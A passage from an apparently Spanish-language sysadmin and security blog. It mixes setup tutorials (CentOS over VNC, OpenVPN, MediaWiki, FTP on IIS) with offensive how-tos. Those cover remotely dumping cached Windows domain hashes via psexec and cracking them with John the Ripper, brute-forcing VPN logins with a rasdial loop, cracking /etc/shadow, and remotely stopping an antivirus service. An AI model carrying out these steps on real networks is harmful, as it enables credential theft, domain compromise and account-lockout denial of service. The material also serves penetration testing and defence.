redes-seguridad

Instalando CentOS-5.4 netinstall remotamente (VNC)

2012-02-05T08:00:00.000-08:00

Descargamos CentOS-5.4-i386-netinstall.iso:

Grabamos la iso en un CD y luego lo ponemos en la lectora, indicamos que arranque de cdroom y nos aparecerá lo siguiente. Luego tipearemos "linux text" y daremos ENTER

Seleccionamos el lenguaje de instalación:

El tipo de teclado:

El tipo del repositorio, elegimos en nuestro caso HTTP:

La configuración TCP/Ip, si deseamos ip fija, dhcp, ipv4 ó ipv6:

Indicamos la página y el directorio del repositorio de paquetes:

Nombre del sitio web: vault.centos.org
Directorio CentOS: /5.4/os/i386

Comienza la recuperación de paquetes:

Indicamos que vamos a seguir la instalación remotamente por VNC, luego nos solicitará la password para conectarnos remotamente:

Veremos en pantalla que nos indica la ip:sesión (192.168.1.100:1) a la cual nos conectaremos por VNC para seguir la instalación remota:

Descargamos el cliente VNC (vncviewer):

Lo ejecutamos y nos solicitará la ip:sesion (192.168.0.1:1), ingresamos el password que pusimos previamente y comienza la instalación remota:

Siguiente:

Suprimimos las particiones existentes, tildamos revisar las particiones y click en siguiente:

Confirmamos que deseamos borrarla:

Modificamos las particiones según nuestra conveniencia, yo lo dejo por defecto para este instructivo, pero deberían cambiarlo:

Indicamos donde queremos instalar el grub:

Le colocamos password al gestor de arranque:

Nos da otra opción por si queremos modificar la interface de red ó configurar otra:

Seleccionamos la región:

Ingresamos la contraseña de root:

Destildamos que instale entornos gráficos y seleccionamos la personalización de paquetes:

Entornos de escritorio, todo destildado:

Editores, sólo el vim:

Y los demás paquetes por defecto como vienen:

Siguiente:

Y comienza la instalación:

Steghide - Esteganografia en debian Squeeze

2012-01-20T12:30:00.000-08:00

Steghide:

El man lo describe como un programa de esteganografia.

La esteganografia:

Es una tecnica que permite ocultar información dentro de otro tipo de datos, como ser imágenes o audio.

En este ejemplo ocultaremos un archivo de texto en una imagen JPG.

Instalamos steghide en debian:

root@PruebasIT:~# apt-get install steghide

Lo ejecutamos y vemos que al final nos muestra los parámetros mas comunes:

root@PruebasIT:~# steghide
To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt
To extract embedded data from stg.jpg: steghide extract -sf stg.jpg

Editamos un archivo de texto y escribimos algo dentro:

root@PruebasIT:~# vim ocultar.txt
Esto esta oculto

Ocultamos el file "ocultar.txt" dentro de image.jpg:

root@PruebasIT:~# steghide embed -cf image.jpg -ef ocultar.txt
Enter passphrase:
Re-Enter passphrase:
embedding "ocultar.txt" in "image.jpg"... done

Eliminamos el archivo original:

root@PruebasIT:~# rm -rf ocultar.txt

Verificamos que no esta:

root@PruebasIT:~# ls image.txt
ls: cannot access image.txt: No such file or directory

Extraemos el archivo de texto oculto de la imagen:

root@PruebasIT:~# steghide extract -sf image.jpg
Enter passphrase:
wrote extracted data to "ocultar.txt".

Verificamos que el contenido es el mismo que el que borramos:

root@PruebasIT:~# cat ocultar.txt
esto esta oculto

Eliminar Publicidad en Chrome

2012-01-17T14:56:00.000-08:00

Odias esto?

Usá: AdBlock

Lo añadimos al Chrome:

Instalamos:

Verificamos que no aparece la publicidad en mi blog:

Indicamos que no queremos que oculte publicidad en este dominio:

Excluimos:

Volvemos a ver la Publicidad en nuestro site:

LinkedIn en Blogger

2012-01-17T14:13:00.000-08:00

Hacemos click en Diseño y Elementos de página como muestra la figura:

Luego en Añadir gadget:

Elegimos el HTML/Javascript:

En título ponemos nuestro nombre y en Contenido lo siguiente, tener en cuenta que no agregué los < para que se pueda ver el código, en la imagen está exactamente lo que debemos agregar:

a href="http://www.linkedin.com/pub/hernan-tirado/23/a36/547" img src="http://www.linkedin.com/img/webpromo/btn_myprofile_160x33.gif" width="160" height="33" border="0" alt="Ver mi Perfil en LinkedIn" />/a

Finalmente volvemos a Guardar:

Nota:

http://www.linkedin.com/pub/hernan-tirado/23/a36/547 representa el link de mi perfil
http://www.linkedin.com/img/webpromo/btn_myprofile_160x33.gif representa la imagen que quiero mostrar

Resultado final:

Ver otros íconos: http://www.linkedin.com/profile?promoteProfile

La Legion de Yoda: Trunk SIP entre 2 Asterisk

2012-01-13T19:21:00.000-08:00

La Legion de Yoda: Trunk SIP entre 2 Asterisk: Es Tutorial muestra como hacer un trunk SIP entre 2 Asterisk. La Sede A tiene los internos 80xx y la Sede B los internos 10xx. Para que la S...

Comandos Linux Debian

2011-12-31T05:46:00.000-08:00

Cubo debian:

http://sinwindows.files.wordpress.com/2011/03/debian.png

Recopilación de comandos de esdebian:

http://www.esdebian.org/wiki/lista-comandos-gnulinux-i
http://www.esdebian.org/wiki/lista-comandos-gnulinux-ii
http://www.esdebian.org/wiki/lista-comandos-gnulinux-iii

OpenVPN en debian Squeeze

2011-12-30T21:17:00.000-08:00

Qué es OpenVPN?

OpenVPN es una solución basada en Secure Sockets Layer y red Privada Virtual.

Características:

- Multiplataforma
- Utiliza SSL/TLS
- Simple configuración.
- Es flexible y tiene una amplia configuración.
- Publicado bajo licencia GPL de software libre.
- Se puede implementar en capa 2 ó capa 3 del modelo OSI.
- Permite control mediante grupos mediante reglas de firewall.
- La autenticacion de clientes está basada en certificados, tarjetas inteligentes y/o con credenciales de usuario.
- etc.

Instalación de paquetes:

root@www:~# apt-get install openvpn liblzo2-2 lzop openssl
Do you want to continue [Y/n]? Y
openssl-blacklist liblzo2-2 libpkcs11-helper1 openvpn-blacklist openvpn
Install these packages without verification [y/N]? y

Cargamos el módulo y lo verificamos:

root@www:~# modprobe tun
root@www:~# lsmod | grep tun
tun 8740 0

Creamos keys y Certificados:

root@www:~# cp -r /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn/

Configuramos las variables:

root@www:~# vim /etc/openvpn/easy-rsa/2.0/vars

Cambiar:
export EASY_RSA="`pwd`"
por:
export EASY_RSA="/etc/openvpn/easy-rsa"

Cambiar:
export KEY_COUNTRY=AR
export KEY_PROVINCE=BA
export KEY_CITY=Buenos Aires
export KEY_ORG="Mi VPN"
export KEY_EMAIL="morsa@mi-dominio.com"
export KEY_CONFIG=`/etc/openvpn/easy-rsa/2.0/whichopensslcnf $EASY_RSA`

Darle permisos y ejecutar el script:

root@www:/etc/openvpn/easy-rsa/2.0# chmod a+x vars
root@www:/etc/openvpn/easy-rsa/2.0# ./vars
NOTE: If you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/easy-rsa/keys

root@www:/etc/openvpn/easy-rsa/2.0# ./clean-all
Please source the vars script first (i.e. "source ./vars")
Make sure you have edited it to reflect your configuration.

root@www:/etc/openvpn/easy-rsa/2.0# source ./vars
NOTE: If you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/easy-rsa/keys

root@www:/etc/openvpn/easy-rsa/2.0# ./clean-all

Creamos el CA (Certificado de Autoridad):

root@www:~# /etc/openvpn/easy-rsa/2.0/build-ca
/etc/openvpn/easy-rsa/2.0/build-ca: line 8: /etc/openvpn/easy-rsa/pkitool: No such file or directory

Editamos el build-ca por el error previo, se ve que configuramos alguna variable erronea:

root@www:~# vim /etc/openvpn/easy-rsa/2.0/build-ca

Cambiar:
"$EASY_RSA/pkitool" --interact --initca $*
Por:
"/etc/openvpn/easy-rsa/2.0/pkitool" --interact --initca $*

Volvemos a ejecutar el build-ca para crear el Certificado:

root@www:~# /etc/openvpn/easy-rsa/2.0/build-ca
grep: /etc/openvpn/easy-rsa/openssl.cnf: No such file or directory
pkitool: KEY_CONFIG (set by the ./vars script) is pointing to the wrong
version of openssl.cnf: /etc/openvpn/easy-rsa/openssl.cnf
The correct version should have a comment that says: easy-rsa version 2.x

Colocarle la ruta completa al EASY_RSA, ya que no lo encuentra:

root@www:~# vim /etc/openvpn/easy-rsa/2.0/vars
export EASY_RSA="/etc/openvpn/easy-rsa/2.0/"

root@www:/etc/openvpn/easy-rsa/2.0# source vars

root@www:~# /etc/openvpn/easy-rsa/2.0/clean-all

root@www:/etc/openvpn/easy-rsa/2.0# ./build-ca
Country Name (2 letter code) [AR]:
State or Province Name (full name) [BA]:
Locality Name (eg, city) [BuenosAires]:
Organization Name (eg, company) [MiVPN]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) [MiVPN CA]:
Name []:
Email Address [morsa@mi-dominio.com]:

Creamos las keys en el Servidor:

root@www:/etc/openvpn/easy-rsa/2.0# ./build-key-server servidor
Country Name (2 letter code) [AR]:
State or Province Name (full name) [BA]:
Locality Name (eg, city) [BuenosAires]:
Organization Name (eg, company) [MiVPN]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) [servidor]:
Name []:
Email Address [morsa@mi-dominio.com]:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:miPassGuord
An optional company name []:RedesSeguridad
Using configuration from /etc/openvpn/easy-rsa/2.0//openssl.cnf
Check that the request matches the signature
Signature ok
The Subject's Distinguished Name is as follows
countryName :PRINTABLE:'AR'
stateOrProvinceName :PRINTABLE:'BA'
localityName :PRINTABLE:'BuenosAires'
organizationName :PRINTABLE:'MiVPN'
commonName :PRINTABLE:'servidor'
emailAddress :IA5STRING:'morsa@mi-dominio.com'
Certificate is to be certified until Dec 28 00:19:33 2021 GMT (3650 days)
Sign the certificate? [y/n]:

1 out of 1 certificate requests certified, commit? [y/n]
Write out database with 1 new entries
Data Base Updated

Creamos la de un cliente solo, si quiere agregar más solo va cambiando el clienteA por otro nombre deseado:

root@www:/etc/openvpn/easy-rsa/2.0# ./build-key clienteA
Country Name (2 letter code) [AR]:
State or Province Name (full name) [BA]:
Locality Name (eg, city) [BuenosAires]:
Organization Name (eg, company) [MiVPN]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) [clienteA]:
Name []:
Email Address [morsa@mi-dominio.com]:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:otroPass
An optional company name []:RedesSeguridad
Using configuration from /etc/openvpn/easy-rsa/2.0//openssl.cnf
Check that the request matches the signature
Signature ok
The Subject's Distinguished Name is as follows
countryName :PRINTABLE:'AR'
stateOrProvinceName :PRINTABLE:'BA'
localityName :PRINTABLE:'BuenosAires'
organizationName :PRINTABLE:'MiVPN'
commonName :PRINTABLE:'clienteA'
emailAddress :IA5STRING:'morsa@mi-dominio.com'
Certificate is to be certified until Dec 28 00:32:03 2021 GMT (3650 days)
Sign the certificate? [y/n]:y

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated

Crear parámetros DF (Diffie Hellman):

root@www:/etc/openvpn/easy-rsa/2.0# ./build-dh
Generating DH parameters, 1024 bit long safe prime, generator 2
This is going to take a long time
.......................+...+....................................................................................................+.........................+.............+..........................................................................+....+........+......+..................+................................+................+.............................

Keys:

El directorio /etc/openvpn/easy-rsa/2.0/keys contiene las keys generadas previamente:

root@www:/etc/openvpn/easy-rsa/2.0/keys# ls -l
total 68
-rw-r--r-- 1 root root 3862 Dec 30 21:19 01.pem
-rw-r--r-- 1 root root 3741 Dec 30 21:32 02.pem
-rw-r--r-- 1 root root 1204 Dec 30 21:17 ca.crt
-rw------- 1 root root 887 Dec 30 21:17 ca.key
-rw-r--r-- 1 root root 3741 Dec 30 21:32 clienteA.crt
-rw-r--r-- 1 root root 749 Dec 30 21:32 clienteA.csr
-rw------- 1 root root 887 Dec 30 21:32 clienteA.key
-rw-r--r-- 1 root root 245 Dec 30 21:35 dh1024.pem
-rw-r--r-- 1 root root 216 Dec 30 21:32 index.txt
-rw-r--r-- 1 root root 21 Dec 30 21:32 index.txt.attr
-rw-r--r-- 1 root root 21 Dec 30 21:19 index.txt.attr.old
-rw-r--r-- 1 root root 108 Dec 30 21:19 index.txt.old
-rw-r--r-- 1 root root 3 Dec 30 21:32 serial
-rw-r--r-- 1 root root 3 Dec 30 21:19 serial.old
-rw-r--r-- 1 root root 3862 Dec 30 21:19 servidor.crt
-rw-r--r-- 1 root root 753 Dec 30 21:19 servidor.csr
-rw------- 1 root root 887 Dec 30 21:19 servidor.key

Para autenticar a la VPN desde el cliente debemos copiar el ca.crt, clienteA.crt y clienteA.key. Cualquiera que tenga estos 3 archivos puede conectarse a la VPN, es recomendable transferirlos por un canal seguro ó encriptando los archivos.

Copiamos los archivos restantes a la ruta /etc/openvpn:

root@www:~# cd /etc/openvpn/easy-rsa/2.0/keys/
root@www:/etc/openvpn/easy-rsa/2.0/keys# cp -pf ca.crt ca.key dh1024.pem servidor.crt servidor.key /etc/openvpn/

Configuramos la VPN en el Servidor:

Creamos el archivo openvpn.conf y ponemos lo siguiente:

root@www:~# vim /etc/openvpn/openvpn.conf
#Interface, protocolo y puerto
dev tun
proto tcp
port 1194

#Keys y Certificados
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem

#Usuario, grupo e ip
user nobody
group nogroup
server 10.8.0.0 255.255.255.0

#Queda persistente al reinicio
persist-key
persist-tun

#Estado de verbosidad openvpn-status.log
#verb 3
client-to-client

push "redirect-gateway def1"

#log-append /var/log/openvpn
comp-lzo

Iniciamos el demonio:

root@www:~# /etc/init.d/openvpn start
Starting virtual private network daemon: openvpn failed!

Habilitamos el log en el /var/log/ para depurar el motivo por el cuál no inicia:

root@www:~# vim /etc/openvpn/openvpn.conf

Descomentar:
log-append /var/log/openvpn

Mostrar el log mientras reiniciamos nuevamente el servicio:

root@www:~# tail -f /var/log/openvpn
Fri Dec 30 22:49:22 2011 OpenVPN 2.1.3 i486-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Oct 21 2010
Fri Dec 30 22:49:22 2011 WARNING: --keepalive option is missing from server config
Fri Dec 30 22:49:22 2011 NOTE: your local LAN uses the extremely common subnet address 192.168.0.x or 192.168.1.x. Be aware that this might create routing conflicts if you connect to the VPN server from public locations such as internet cafes that use the same subnet.
Fri Dec 30 22:49:22 2011 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Fri Dec 30 22:49:22 2011 Cannot open /etc/openvpn/easy-rsa/keys/dh1024.pem for DH parameters: error:02001002:system library:fopen:No such file or directory: error:2006D080:BIO routines:BIO_new_file:no such file
Fri Dec 30 22:49:22 2011 Exiting

Modificar la ruta de los archivos que pusimos incorrectamente:

root@www:~# vim /etc/openvpn/openvpn.conf
#Keys y Certificados
ca /etc/openvpn/ca.crt
cert /etc/openvpn/servidor.crt
key /etc/openvpn/servidor.key
dh /etc/openvpn/dh1024.pem

Reiniciamos nuevamente y vemos en el log que no hay errores:

root@www:~# /etc/init.d/openvpn start
Starting virtual private network daemon: openvpn.
root@www:~#

root@www:~# tail -f /var/log/openvpn
Fri Dec 30 23:00:07 2011 OpenVPN 2.1.3 i486-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Oct 21 2010
Fri Dec 30 23:00:07 2011 WARNING: --keepalive option is missing from server config
Fri Dec 30 23:00:07 2011 NOTE: your local LAN uses the extremely common subnet address 192.168.0.x or 192.168.1.x. Be aware that this might create routing conflicts if you connect to the VPN server from public locations such as internet cafes that use the same subnet.
Fri Dec 30 23:00:07 2011 NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables
Fri Dec 30 23:00:07 2011 /usr/bin/openssl-vulnkey -q -b 1024 -m
Fri Dec 30 23:00:08 2011 TUN/TAP device tun0 opened
Fri Dec 30 23:00:08 2011 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Fri Dec 30 23:00:08 2011 GID set to nogroup
Fri Dec 30 23:00:08 2011 UID set to nobody
Fri Dec 30 23:00:08 2011 Listening for incoming TCP connection on [undef]
Fri Dec 30 23:00:08 2011 TCPv4_SERVER link local (bound): [undef]
Fri Dec 30 23:00:08 2011 TCPv4_SERVER link remote: [undef]
Fri Dec 30 23:00:08 2011 Initialization Sequence Completed

Tengamos en cuenta que tengo una ip privada en vez de una ip pública en el server, por eso indica que haya posibles conflictos de ruteo si se conecta a la VPN

Vemos la interface virtual tun0 cuando iniciamos el servicio de VPN:

root@www:~# ifconfig tun
tun0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:10.8.0.1 P-t-P:10.8.0.2 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Vemos también que está escuchando en el puerto configurado:

root@www:~# netstat -tpln | grep openvpn
tcp 0 0 0.0.0.0:1194 0.0.0.0:* LISTEN 4042/openvpn

NOTA: Si notamos un poco lenta la conexión comentamos la linea de compresión: comp-lzo en /etc/openvpn/openvpn.conf

Cliente OpenVPN para windows XP:

Descargamos el cliente de:
http://swupdate.openvpn.net/downloads/openvpn-client.msi

Requiere el adonet, lo descargamos de Microsoft:
http://www.microsoft.com/download/en/confirmation.aspx?id=22

Luego de instalar el adonet instalamos por defecto el cliente vpn para windows y creamos un archivo llamado: ClienteA.ovpn:

#Contenido de ClienteA.ovpn
dev tun
client
proto tcp
remote 192.168.1.102 1194
resolv-retry infinite
nobind
user nobody
group nogroup

persist-key
persist-tun
ca ca.crt
cert clienteA.crt
key clienteA.key
comp-lzo

verb 3

Lo importamos, nos aparece un error que no encuentra el ca.crt, luego pasa lo mismo con ClienteA.crt y con ClienteA.key:

Le colocamos los archivos en la ruta correcta y volvemos a importar el archivo ClienteA.ovpn:

Seleccionamos Local File:

Clickeamos en el + de Connection Profiles:

Seleccionamos el botón naranja como indica la siguiente imagen:

Ya nos hemos conectado a la VPN:

Vemos en los logs cuando se establece la conexión:

root@www:~# tail -f /var/log/openvpn
Sat Dec 31 00:23:26 2011 TCPv4_SERVER link local: [undef]
Sat Dec 31 00:23:26 2011 TCPv4_SERVER link remote: [AF_INET]192.168.1.100:14407
Sat Dec 31 00:23:27 2011 192.168.1.100:14407 [clienteA] Peer Connection Initiated with [AF_INET]192.168.1.100:14407
Sat Dec 31 00:25:16 2011 clienteA/192.168.1.100:14407 Connection reset, restarting [-1]
Sat Dec 31 00:27:15 2011 Re-using SSL/TLS context
Sat Dec 31 00:27:15 2011 LZO compression initialized
Sat Dec 31 00:27:15 2011 TCP connection established with [AF_INET]192.168.1.100:14446
Sat Dec 31 00:27:15 2011 TCPv4_SERVER link local: [undef]
Sat Dec 31 00:27:15 2011 TCPv4_SERVER link remote: [AF_INET]192.168.1.100:14446
Sat Dec 31 00:27:16 2011 192.168.1.100:14446 [clienteA] Peer Connection Initiated with [AF_INET]192.168.1.100:14446

Bloqueamos acceso SSH al servidor de openVPN desde la VPN:

root@www:~# iptables -A INPUT -s 10.8.0.0/24 -p tcp --dport 22 -j DROP

Habilitamos todo el tráfico desde la ip 10.8.0.6(la ip que nos asignó en este caso) hacia internet conectado en la VPN:

root@www:~# iptables -t nat -A POSTROUTING -s 10.8.0.6/32 -o eth0 -j MASQUERADE
root@www:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Ahora tenemos el tráfico enrutado por el server VPN, podemos hacer ping a google, conectarnos al msn y navegar por internet:

C:\Documents and Settings\user>ping www.google.com.ar
Pinging www.l.google.com [74.125.47.99] with 32 bytes of data:
Reply from 74.125.47.99: bytes=32 time=299ms TTL=50
Reply from 74.125.47.99: bytes=32 time=203ms TTL=50

Vemos las reglas en iptables:

root@www:~# iptables -L -n -t nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- 10.8.0.6 0.0.0.0/0

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Ponemos en el rc.local el contenido de los comandos que queremos qu ese ejecuten cuando se reinicie el server.

Revocando Certificados de Clientes:

Si deseamos que un cliente no se conecte más a la VPN simplemente revocamos su certificado cno los siguientes comandos:

root@www:~# /etc/openvpn/easy-rsa/2.0/vars
root@www:~# /etc/openvpn/easy-rsa/2.0/revoke-full clienteA

FUENTES:

Wikipedia
OpenVPN.net
library.linode.com
www.ventanazul.com
jroliva.wordpress.com
diegosamuel.blogspot.com

MediaWiki en Debian Squeeze

2011-12-28T16:35:00.000-08:00

Que es MediaWiki?

Es un software libre de codigo abierto escrito en php, originalmente usado en Wikipedia.

Instalamos requerimientos (LAMP):

apt-get install apache2 php5 mysql-server

Nos requiere usuario y pass de mysql:

Instalamos la wiki:

apt-get install mediawiki

Creamos enlace simbólico:

ln -s /usr/share/mediawiki/ /var/www/mediawiki

Accedemos a la página, reemplazamos la ip por la de nuestro equipo:
http://192.168.1.100/mediawiki/

Configuramos la Wiki:

http://192.168.1.100/mediawiki/index.php/P%C3%A1gina_Principal

Clickeamos en Setup:

Colocamos el nombre de la Wiki y el correo:

Seleccionamos el idioma, la licencia, el usuario y password del administrador:

La siguiente configuración de la Base de Datos:

Movemos el siguiente archivo y accedemos al link que nos sugiere la imagen:

mv /var/lib/mediawiki/config/LocalSettings.php /etc/mediawiki/

Obtener hashes de Windows Remotamente

2011-12-28T06:49:00.000-08:00

Para realizar esta actividad primero debemos tener acceso de administrador local de la pc remota.

La pregunta que seguramente se están haciendo en este momento debe ser: Por que motivo voy a obtener los hashes si ya tengo acceso de administrador local?

La respuesta es simple, puede ser para obtener otras credenciales de usuarios de dominio, nosotros tenemos solo la password del administrador local, el cual no tiene acceso a la VPN. En cambio si obtenemos el hash de un usuario de dominio y lo crackeamos, podriamos tener acceso a la red remotamente.

Por defecto windows cachea localmente los hashes de usuarios de dominio en el registro, esto lo realiza por si en algun momento el controlador de dominio donde se autentica el usuario no esta disponible. En el caso de una notebook, cuando un usuario la desconecta de la red interna y se la lleva a su casa no podria loguearse con su user ya que no tiene donde validar las credenciales.

Algo mas interesante seria si un usuario con privilegios de administrador de dominio se hubiese logueado en algun momento en dicha maquina, obtendriamos el hash, lo crackeariamos y si obtenemos exito seriamos admin. del dominio.

1) Descargamos la herramienta cacheDump desde: CacheDump

2) Creamos un archivo cache.bat que contenga dentro lo siguiente:

c:\cachedump.exe > c:\hash.txt

Este bat contiene la ruta del cachedump.exe y la salida de dicha ejecucion (los hashes) la anviara a un archivo llamado hash.txt ubicado en el c:

3) Accedemos remotamente al disco remoto mediante \\192.168.1.100\c$ y copiamos en el C el cachedump.exe y el cache.bat. Esto podemos hacerlo porque tenemos acceso como admin local de dicha Pc. Si queremos usuar la CLI lo hacemos con xcopy:

c:\> xcopy cachedump.exe "\\192.168.1.100\c$"
c:\> xcopy cache.bat "\\192.168.1.100\c$"

4) Ejecutamos el cache.bat con psexec (Para uso y descarga de psexec ver el link: http://www.redes-seguridad.com.ar/2011/12/ejecutar-tareas-remotamente-pstools.html)

c:\> psexec -s -i -d \\192.168.1.100 c:\cache.bat

5) Copiamos el hash.txt del c: remoto a nuestra PC:

c:\>xcopy \\192.168.1.100\c$\hash.txt c:\

6) Vemos el contenido de los usuarios, los hashes y el dominio:

c:\> type hash.txt
user1:A12BC15F401B96733F47912084CDD651:mi-dominio:mi-dominio.com
user2:31765416AFBACB8976563DBFE90155D:mi-dominio:mi-dominio.com

7) Ataque de diccionario con John:
(Para instalarlarlo en linux consultar este link: http://www.redes-seguridad.com.ar/2011/12/cracking-passwd-con-john-ripper.html)

root@morsa:~# john --wordlist=lista.txt -format:mscash hash.txt

lista.txt => es un archivo de texto que contiene palabras de diccionario
hash.txt => es el hash que obtuvimos de la pc atacada

8) En cambio si no logramos nada con ataque por diccionario tendremos que hacer uno por fuerza bruta, incremental:

root@morsa:~# john --incremental -format:mscash hash.txt

Ejecutar Comandos remotamente (PStools)

2011-12-27T12:57:00.000-08:00

Descargamos PStool de: http://download.sysinternals.com/Files/PsTools.zip

Abrimos el notepad.exe en la pc remota con ip 192.168.1.100:

psexec -s -i -d \\192.168.1.100 notepad
PsExec \\192.168.1.100 -s -i -d notepad.exe c:\prueba.txt (El archivo debe estar en la PC remota)

Instalar impresora remotamente:

psexec -s -i -d \\nombre-Pc c:\windows\system32\RUNDLL32 PRINTUI.DLL,PrintUIEntry /il

Abrir pagina web remotamente:

PsExec \\192.168.1.100 -s -i -d "c:\Program Files\Internet Explorer\iexplore.exe" www.redes-seguridad.com.ar

Instalar MSN live Messenger remotamente:
Copiar el instalador del msn wlsetup-web.exe en la pc destino: \\192.168.1.100\c$
Luego ejecutar el instalador:

PsExec.exe \\nombre_de_PC -s -i -d "c:\wlsetup-web.exe"

Matar un proceso en la pc 192.168.1.100 indicando el pid (Identificador de Proceso) en este caso es 328:

pskill \\192.168.1.100 328

Como obtengo el pid para elegir que matar? Desde pslist:

pslist \\192.168.1.100 | find "notepad"
notepad 328 8 1 44 1052 0:00:00.078 0:00:10.296
(PID)

Como saber en que maquinas esta logueado un usuario:

psloggedon nombreUsuario

Obtener el SID de usuario o de PC:

psgetsid nombreUsuario
psgetsid \\nombrePC

Obtener info de una Pc:

psinfo \\192.168.1.100

Listar los procesos en ejecucion en PC remota:

pslist \\192.168.1.100

Ver Visor Suceso de Pc remota:

psloglist \\192.168.1.100

Lista o cierra archivos abiertos remotamente:

psfile \\192.168.1.100

Ver estados de los servicios:

psservice \\192.168.1.100 query

Verificar en que equipos esta el servicio del Panda Antivirus:

psservice find PavSrv all

Detener el Servicio en PC remota:

psservice \\192.168.1.100 stop nombreServicio

Detenemos el servicio:

psservice \\192.168.1.100 stop nombreServicio

Verificamos si el servicio esta corriendo:

psservice \\192.168.1.100 query pavsrv

SERVICE_NAME: PavSrv
DISPLAY_NAME: Panda Antivirus Service
GROUP : Anti-Virus
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0 ms

Volvemos a iniciar el servicio del Panda:

psservice \\192.168.1.100 start pavsrv

Fuerza Bruta VPN

2011-12-23T11:30:00.000-08:00

Editamos un archivo llamado pass.txt, donde dentro pondremos usuarios y contraseñas en dos columnas distintas, por ejemplo:

Inicio -> ejecutar -> cmd
C:\>edit pass.txt
#usuario password
usuario1 password1
usuario1 password2
usuario1 passwordM
........ .........
usuario2 password1
usuario2 password2
usuario2 passwordM
........ .........
usuarioN password1
usuarioN password2
........ .........
usuarioN passwordM

En este enlace ya hemos visto el comando para conectarnos por línea de comandos a una VPN desde windows: Conexión VPN por CLI

Utilizaremos este comando dentro de un ciclo for para automatizar el ingreso de usuarios/contraseñas del siguiente modo:

c:\> FOR /F "tokens=1,2*" %i in (pass.txt) do rasdial miVPN %i %j

Tengamos en cuenta que pass.txt es el archivo que hemos editado previamente y que miVPN es el nombre que le asignamos cuando creamos la conexión.

NOTA:

Obviamente si nos encontramos con buenos administradores, podríamos hacerlo solamente 3 o 5 veces, o segun la cantidad de intentos que tenga configurado en sus políticas de dominio para el bloqueo de cuentas de usuario.

Esto ultimo tiene su ventaja como desventaja, debido a que el administrador de los servidores puede evitar que obtengan passwords de sus usuarios, pero si un atacante posee todos los usuarios del dominio podría a llegar a hacer una forma de DoS (Denegacion de Servicio), debido a que si realiza dicho procedimiento por cada usuario 3 veces lograria bloquear todas las cuentas de un dominio. Esto le daria un gran dolor de cabeza a dicho administrador.

Cracking passwd con John the Ripper

2011-12-20T19:46:00.001-08:00

Descargamos el John:

root@prueba:~# wget http://www.openwall.com/john/g/john-1.7.9.tar.gz

Destareamos/Descomprimimos:

root@prueba:~# tar xzvf john-1.7.9.tar.gz

Accedemos a la ruta de los fuentes:

root@prueba:~# cd john-1.7.9/src/

Compilamos para linux x86:

root@prueba:~/john-1.7.9/src# make linux-x86-any

Instalamos:

root@prueba:~/john-1.7.9/src# make install

Accedemos a los ejecutables compilados:

root@prueba:~/john-1.7.9# cd run/

Copiamos el passwd y el shadow en otra ruta:

root@prueba:~/john-1.7.9/run# cp /etc/passwd /etc/shadow /root/

Corremos el unshadow y redireccionamos la salida a un archivo llamado unsha.txt:

root@prueba:~/john-1.7.9/run# ./unshadow /root/passwd /root/shadow > /root/unsha.txt

Corremos el john con un modo simple y le pasamos como parametro el archivo que creamos:

root@prueba:~/john-1.7.9/run# ./john -single /root/unsha.txt
Loaded 1 password hash (generic crypt(3) [?/32])
guesses: 0 time: 0:00:00:03 23% c/s: 25.13 trying: Morsa8 - mor$a
guesses: 0 time: 0:00:00:07 38% c/s: 25.09 trying: Mors4 - \morsa
Mors4 (morsa)
guesses: 1 time: 0:00:00:11 100% c/s: 25.10 trying: Mors4 - \morsa
Use the "--show" option to display all of the cracked passwords reliably

Usamos la opción show para ver los passwords crackeados:

root@prueba:~/john-1.7.9/run# ./john -show /root/unsha.txt
morsa:Mors4:1002:1003::/home/morsa:/bin/sh
1 password hashes cracked, 0 left

Nos da como resultado del usuario morsa su correspondiente password: Mors4

FTP Server en Windows 2003

2011-12-19T09:00:00.000-08:00

Ingresamos al panel de Control:

Agregar o quitar programas:

Agregar o quitar componentes de windows:

Application Server -> Details:

Internet Information Services (ISS) -> Details:

Tildamos File Transfer Protocol (FTP) Service -> Ok

Creamos una carpeta que yo llamare: CarpetaFTP en la ruta: c:\Inetpub\ftproot\:

Abrimos el IIS:

Desplegamos el arbol -> boton derecho en Default FTP Site -> New -> Virtual Directory:

Next:

Ingresamos el Alias para Directorio Virtual:

Buscamos la carpeta:

En nuestro caso permitimos lectura y ejecucion:

Finish:

Desplegamos nuevamente el arbol -> FTP Sites -> Default FTP Site -> CarpetaFTP -> Boton derecho: Permisos

